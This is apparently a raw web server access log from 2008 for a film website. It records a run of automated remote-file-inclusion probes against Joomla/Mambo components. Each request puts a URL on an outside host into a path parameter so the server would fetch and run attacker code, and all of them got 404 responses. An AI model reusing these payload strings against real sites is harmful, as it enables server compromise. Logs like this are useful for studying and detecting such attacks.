193.109.252.52 - - [28/Aug/2008:07:18:55 -0700] "GET /logs/access_080801.log%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
218.188.197.136 - - [28/Aug/2008:07:19:05 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
217.20.138.101 - - [28/Aug/2008:07:19:11 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
218.189.215.148 - - [28/Aug/2008:07:19:17 -0700] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.topyn.com/ips.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
218.189.215.148 - - [28/Aug/2008:07:19:17 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.topyn.com/ips.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:07:19:35 -0700] "GET /logs/access_080816.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:07:19:35 -0700] "GET /logs/access_080816.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:07:19:35 -0700] "GET /logs/access_080816.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:07:19:35 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:07:19:35 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:07:19:36 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:07:19:36 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:07:19:36 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:07:19:36 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
209.85.26.17 - - [28/Aug/2008:07:20:07 -0700] "GET /logs/access_080801.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
209.85.26.17 - - [28/Aug/2008:07:20:07 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
209.85.26.17 - - [28/Aug/2008:07:20:07 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:07:20:08 -0700] "GET /logs/access_080816.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:07:20:08 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:07:20:09 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
209.85.26.17 - - [28/Aug/2008:07:20:18 -0700] "GET /logs/access_080809.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
216.193.201.57 - - [28/Aug/2008:07:21:06 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.realityfilm.com"
200.93.147.155 - - [28/Aug/2008:07:21:10 -0700] "GET /logs/apa_phpinclude.inc.php?apa_module_basedir=http://vcd.co.uk/uploadfiles/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]